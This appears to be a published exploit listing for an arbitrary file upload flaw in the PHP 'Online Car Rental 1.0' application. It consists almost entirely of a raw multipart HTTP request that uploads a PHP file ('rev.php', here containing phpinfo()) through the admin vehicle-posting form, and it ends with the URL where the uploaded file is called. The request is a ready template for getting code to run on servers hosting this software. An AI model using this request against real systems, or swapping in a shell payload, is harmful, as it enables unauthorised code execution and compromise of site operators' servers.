Share
## https://sploitus.com/exploit?id=PACKETSTORM:161358
# Exploit Title: Online Car Rental 1.0 | Arbitrary file upload  
# Exploit Author: Richard Jones  
# Date: 2021/09/02  
# Vendor Homepage: https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14145&title=Online+Car+Rental+System+Using+PHP%2FMySQL+with+Source+Code  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34  
  
  
  
POST /Online%20Car%20Rental/admin/post-avehical.php HTTP/1.1  
Host: TARGETURL  
Content-Type: multipart/form-data; boundary=---------------------------41518493223397502791049196241  
Content-Length: 1819  
Cookie: PHPSESSID=8ouf7h44qe55bk4eqai1p145o1  
Upgrade-Insecure-Requests: 1  
  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="vehicletitle"  
  
a  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="brandname"  
  
2  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="vehicalorcview"  
  
a  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="priceperday"  
  
1  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="fueltype"  
  
Petrol  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="modelyear"  
  
1  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="seatingcapacity"  
  
1  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="img1"; filename="rev.php"  
Content-Type: application/octet-stream  
  
<?php phpinfo(); ?>  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="img2"; filename="Untitled.png"  
Content-Type: image/png  
  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="img3"; filename="Untitled.png"  
Content-Type: image/png  
  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="img4"; filename="Untitled.png"  
Content-Type: image/png  
  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="img5"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="submit"  
  
  
-----------------------------41518493223397502791049196241--  
  
  
# Call malicious file at: http://TARGETURL/Online%20Car%20Rental/admin/img/vehicleimages/rev.php